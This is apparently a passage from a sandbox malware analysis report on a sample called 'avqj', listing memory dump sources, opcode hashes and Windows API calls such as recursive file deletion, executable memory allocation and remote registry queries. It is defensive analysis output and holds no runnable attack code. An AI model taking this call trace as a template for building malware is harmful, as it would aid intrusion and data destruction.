                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: aea155f1e03846a7945f3ef32b85c3da0dbec0b08e6aeb419bf15716d252f37c
                                              • Instruction ID: 5aa988a2554262a4d8b15957e83f5b75a59986071a1eb4cc704ee70080e1dd3d
                                              • Opcode Fuzzy Hash: aea155f1e03846a7945f3ef32b85c3da0dbec0b08e6aeb419bf15716d252f37c
                                              • Instruction Fuzzy Hash: C8F0F432601B205AC6253A6A9C05BAB32D89F8B334F142B55F965BA2D1DF74F8028692
                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00EB31B9,00000001,00000364,?,?,?,0000000A,00000000), ref: 00EB504E
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: d69aa5fb4b9a5795ed8bf00ccaa7af800a60124c2ef09793de692a48293a7bb6
                                              • Instruction ID: 1f0d44aae67c40de1f20a8cc61ff32f2e969d278e688162c6f0eac95d5b9f8bc
                                              • Opcode Fuzzy Hash: d69aa5fb4b9a5795ed8bf00ccaa7af800a60124c2ef09793de692a48293a7bb6
                                              • Instruction Fuzzy Hash: 58F0E933600E2467DB313B62AC01BDB3798AF457B1B14A116FC04BA1A0CA74EC0096E0
                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00EA6A99,?,0000015D,?,?,?,?,00EA85D0,000000FF,00000000,?,?), ref: 00EB3BE2
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 71d565541c4a48b8d0a8300cf197e7a6adf5f5dbc36fc91cb4fa36aa464a124c
                                              • Instruction ID: 2e91af380fb511e176326877237ab46c750a57b0a623d44ed363dc574c7c6db3
                                              • Opcode Fuzzy Hash: 71d565541c4a48b8d0a8300cf197e7a6adf5f5dbc36fc91cb4fa36aa464a124c
                                              • Instruction Fuzzy Hash: 72E0653120462457E6612B7AAC82FDB3698DB427B5F152162EC45F6495DB61ED0081E1
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5dcbb912798ce3dc0709aef7ae2bd06ab721b1923bd9c9cd33af824d4d12f799
                                              • Instruction ID: 9b10c0e8bf27b801103347b4e0fc197fbeffb7cf81d47d9342d9e007fc63d4a8
                                              • Opcode Fuzzy Hash: 5dcbb912798ce3dc0709aef7ae2bd06ab721b1923bd9c9cd33af824d4d12f799
                                              • Instruction Fuzzy Hash: 04F03971101B12CFCB34AF64D494866BBF5FF1432A324993EE1DBA2A20C732A880DF50
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: __fread_nolock
                                              • String ID:
                                              • API String ID: 2638373210-0
                                              • Opcode ID: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                              • Instruction ID: 7a5361c2d55a8f99584edc86b65112c7e0c9e5f3f194cc376a8c716952429600
                                              • Opcode Fuzzy Hash: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                              • Instruction Fuzzy Hash: D4F0F87240020DFFDF05DF94C941E9EBBB9FB18318F209449F9199A251D336EA61EBA1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: _wcslen
                                              • String ID:
                                              • API String ID: 176396367-0
                                              • Opcode ID: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                              • Instruction ID: e7d071528444458c9c4a04aa9ec9b617b2b806ce09207d47a971fd400318edf0
                                              • Opcode Fuzzy Hash: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                              • Instruction Fuzzy Hash: D7D05EA334201025B669213D2D4BD7F859CCBC77A0B04143EFA06DE1E5E8845C0200A0
                                              APIs
                                              • GetShortPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EEE7A2
                                                • Part of subcall function 00E884B7: _wcslen.LIBCMT ref: 00E884CA
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: NamePathShort_wcslen
                                              • String ID:
                                              • API String ID: 2021730007-0
                                              • Opcode ID: dc2f790c6c982452cb082bb39d9a9cf5306c67bdd78f33e1b38364e83c9ecb49
                                              • Instruction ID: 81ab5461480d2aa595be6f05d00cb7f9495674605f734a70fe95a9a4c108861e
                                              • Opcode Fuzzy Hash: dc2f790c6c982452cb082bb39d9a9cf5306c67bdd78f33e1b38364e83c9ecb49
                                              • Instruction Fuzzy Hash: 67E0CD7260023457C710A2989C05FDA77EDDFC8790F054074FD09E7258DD64DD808690
                                              APIs
                                              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,?,00E8B0DE,?,?,00000000,?,00E86B73,?), ref: 00E9F156
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: 846fceca84d8a28c5bd1a81341d87f555e446506250b1a22414586d69cf8f7d1
                                              • Instruction ID: 25f07b5a3f05f49c5fe54961849d7c744765525cc54eab900463378346b6b5e3
                                              • Opcode Fuzzy Hash: 846fceca84d8a28c5bd1a81341d87f555e446506250b1a22414586d69cf8f7d1
                                              • Instruction Fuzzy Hash: 38E092B5510704BFE728DF55D84AD97BBF8EB08310B00455EA85693740E7B1BD448B50
                                              APIs
                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E839FD
                                                • Part of subcall function 00E884B7: _wcslen.LIBCMT ref: 00E884CA
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: LongNamePath_wcslen
                                              • String ID:
                                              • API String ID: 541455249-0
                                              • Opcode ID: 58797dffebc3aa16ca0d112e4a902f61a34c2328330d0b218cb9d8905e662496
                                              • Instruction ID: 54b47f719a077490f3889882e4f124a725cf7f8b06784ae44795127f2eb28467
                                              • Opcode Fuzzy Hash: 58797dffebc3aa16ca0d112e4a902f61a34c2328330d0b218cb9d8905e662496
                                              • Instruction Fuzzy Hash: A8E0C272A002285BCB20A2989C06FEAB7EDDFC8790F0540B5FD09E7258DDB4ED809690
                                              APIs
                                              • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00EEE76C
                                                • Part of subcall function 00E884B7: _wcslen.LIBCMT ref: 00E884CA
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: FolderPath_wcslen
                                              • String ID:
                                              • API String ID: 2987691875-0
                                              • Opcode ID: 5f066cf6eaecb62a9760491278b4226446394682ab1eedd08722c2d237f7d742
                                              • Instruction ID: f3f89065eea1a56a44ccf28367ddb2a0de3c95a73bdea5d4f7395492ff6e185e
                                              • Opcode Fuzzy Hash: 5f066cf6eaecb62a9760491278b4226446394682ab1eedd08722c2d237f7d742
                                              • Instruction Fuzzy Hash: 1ED05EA29002282BDF60E6B49D0DDF73AACC740250F0046A17C6DD3142E934ED4486A0
                                              APIs
                                              • CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,00EED9DC,?,?), ref: 00EEDA72
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: CopyFile
                                              • String ID:
                                              • API String ID: 1304948518-0
                                              • Opcode ID: e4a2782cae0bf11807f6737d54ca11facf5dcc3494c99d8f4a700fc37a85c60b
                                              • Instruction ID: 2662c0b211a3c094d5b52bf68fa752a23a4b75a1b9b98f011bb5340c5e419270
                                              • Opcode Fuzzy Hash: e4a2782cae0bf11807f6737d54ca11facf5dcc3494c99d8f4a700fc37a85c60b
                                              • Instruction Fuzzy Hash: 4AD0C7305D020DBBEF509B51CD07F99B77CE711B45F104194B101EA0D0D7B5A519A765
                                              APIs
                                              • CreateFileW.KERNELBASE(00000000,00000000,?,00EC0AA4,?,?,00000000,?,00EC0AA4,00000000,0000000C), ref: 00EC0757
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 2b95f24d771df0a269b408b6d5178c4935b8070619d57caaceea450f76edd9e3
                                              • Instruction ID: 0e0c6c12ed28a3ad5d5924ae5743017a1a3c99fdc8fd3cb9fc7f2dcbf5b0aa35
                                              • Opcode Fuzzy Hash: 2b95f24d771df0a269b408b6d5178c4935b8070619d57caaceea450f76edd9e3
                                              • Instruction Fuzzy Hash: A1D06C3204010DBBDF028F84DD06EDA3BAAFB48714F018000BE1866020C732E821AB90
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,00EED755), ref: 00EEE9C6
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 7833e61004bc6c0aeb3dfc3d0e4b91770b01f9ebcbad556705fbd816f7ee389f
                                              • Instruction ID: dbc1286eafa2d80dd6c285c8a89514e284887e8c0ab0997d06babfd02fa19736
                                              • Opcode Fuzzy Hash: 7833e61004bc6c0aeb3dfc3d0e4b91770b01f9ebcbad556705fbd816f7ee389f
                                              • Instruction Fuzzy Hash: 7CB092240006A805BD790A391A080A9339068C33AA7D82BD5E4B9A52E3C33F880BE610
                                              APIs
                                                • Part of subcall function 00EEDB69: FindFirstFileW.KERNELBASE(?,?), ref: 00EEDBE0
                                                • Part of subcall function 00EEDB69: DeleteFileW.KERNELBASE(?,?,?,?), ref: 00EEDC30
                                                • Part of subcall function 00EEDB69: FindNextFileW.KERNEL32(00000000,00000010), ref: 00EEDC41
                                                • Part of subcall function 00EEDB69: FindClose.KERNEL32(00000000), ref: 00EEDC58
                                              • GetLastError.KERNEL32 ref: 00EF6583
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                               • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                              • String ID:
                                              • API String ID: 2191629493-0
                                              • Opcode ID: da0e1483a42ea4590e42fe332858fec2473a645d4b7f1a525d67dc039a7535b4
                                              • Instruction ID: 238d10b16f6d3feafd0d01bb901fdca662e27b6879a03c606c05b79bd34d7bc8
                                              • Opcode Fuzzy Hash: da0e1483a42ea4590e42fe332858fec2473a645d4b7f1a525d67dc039a7535b4
                                              • Instruction Fuzzy Hash: BAF08C322002049FCB14FF59D844B6AB7E5AF48360F058449F95EAB352CB70FC018B95
                                              APIs
                                              • CloseHandle.KERNELBASE(?,?,00000000,00EC3A1C), ref: 00E87973
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                               • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID:
                                              • API String ID: 2962429428-0
                                              • Opcode ID: 0cbbe8ab5fefe93b501f7c4a88244fdb59a8dccf1e12c70570a7067715faf181
                                              • Instruction ID: fd990ffc3963336199a2d7c98f66d98f51bbcf60bc8328f905471be27fdda5ad
                                              • Opcode Fuzzy Hash: 0cbbe8ab5fefe93b501f7c4a88244fdb59a8dccf1e12c70570a7067715faf181
                                              • Instruction Fuzzy Hash: DBE0B675408B12CFD3315F1AE804452FBF8FFD23613324A2ED0E992660D3B09886DB50
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,012AABBB,0000003C,0000001E,0000004A,0000003E,00000042), ref: 012AAF77
                                              Memory Dump Source
                                              • Source File: 00000008.00000003.2324062632.00000000012A8000.00000004.00000020.00020000.00000000.sdmp, Offset: 012A8000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_3_121a000_avqj.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                              • Instruction ID: 40c475b515769fe5bd464b7529da8eec49418a1cc653ed15f1c8c39e92e4cd76
                                              • Opcode Fuzzy Hash: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                              • Instruction Fuzzy Hash: CBD022F019830337FE257BB04C02F383684AF60B42FC00804B31CBA0E0C5BBE408825A
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,012AABBB,0000003C,0000001E,0000004A,0000003E,00000042), ref: 012AAF77
                                              Memory Dump Source
                                              • Source File: 00000008.00000003.2324062632.00000000012A8000.00000004.00000020.00020000.00000000.sdmp, Offset: 0121A000, based on PE: false
                                               • Associated: 00000008.00000003.2303528910.000000000121A000.00000004.00000020.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_3_121a000_avqj.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                              • Instruction ID: 40c475b515769fe5bd464b7529da8eec49418a1cc653ed15f1c8c39e92e4cd76
                                              • Opcode Fuzzy Hash: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                              • Instruction Fuzzy Hash: CBD022F019830337FE257BB04C02F383684AF60B42FC00804B31CBA0E0C5BBE408825A
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,012AABBB,0000003C,0000001E,0000004A,0000003E,00000042), ref: 012AAF77
                                              Memory Dump Source
                                              • Source File: 00000008.00000003.2324062632.00000000012A8000.00000004.00000020.00020000.00000000.sdmp, Offset: 012A9000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_3_121a000_avqj.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                              • Instruction ID: 40c475b515769fe5bd464b7529da8eec49418a1cc653ed15f1c8c39e92e4cd76
                                              • Opcode Fuzzy Hash: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                              • Instruction Fuzzy Hash: CBD022F019830337FE257BB04C02F383684AF60B42FC00804B31CBA0E0C5BBE408825A
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,012AABBB,0000003C,0000001E,0000004A,0000003E,00000042), ref: 012AAF77
                                              Memory Dump Source
                                              • Source File: 00000008.00000003.2324062632.00000000012A8000.00000004.00000020.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                               • Associated: 00000008.00000003.2303528910.000000000121A000.00000004.00000020.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_3_121a000_avqj.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                              • Instruction ID: 40c475b515769fe5bd464b7529da8eec49418a1cc653ed15f1c8c39e92e4cd76
                                              • Opcode Fuzzy Hash: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                              • Instruction Fuzzy Hash: CBD022F019830337FE257BB04C02F383684AF60B42FC00804B31CBA0E0C5BBE408825A
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00EFA11B
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00EFA176
                                              • FindClose.KERNEL32(00000000), ref: 00EFA181
                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00EFA19D
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00EFA1ED
                                              • SetCurrentDirectoryW.KERNEL32(00F47B94), ref: 00EFA20B
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EFA215
                                              • FindClose.KERNEL32(00000000), ref: 00EFA222
                                              • FindClose.KERNEL32(00000000), ref: 00EFA232
                                                • Part of subcall function 00EEE2AE: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00EEE2C9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                               • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                              • String ID: *.*
                                              • API String ID: 2640511053-438819550
                                              • Opcode ID: 4dc2b5647b2bf50de71255d007b2936c64db93002f8e7188639fcfa64ce32992
                                              • Instruction ID: 69ee9e013d341508f0372828400a4f49cf76f481b429bcce3dc2a6dcf852ee7e
                                              • Opcode Fuzzy Hash: 4dc2b5647b2bf50de71255d007b2936c64db93002f8e7188639fcfa64ce32992
                                              • Instruction Fuzzy Hash: 463148B260131D6ADB10AFA4EC08AEE77BCDF45324F145161F918F70E0DB71DA84DA52
                                              APIs
                                                • Part of subcall function 00F0D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F0C00D,?,?), ref: 00F0D314
                                                • Part of subcall function 00F0D2F7: _wcslen.LIBCMT ref: 00F0D350
                                                • Part of subcall function 00F0D2F7: _wcslen.LIBCMT ref: 00F0D3C7
                                                • Part of subcall function 00F0D2F7: _wcslen.LIBCMT ref: 00F0D3FD
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F0C89D
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00F0C908
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00F0C92C
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F0C98B
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F0CA46
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00F0CAB3
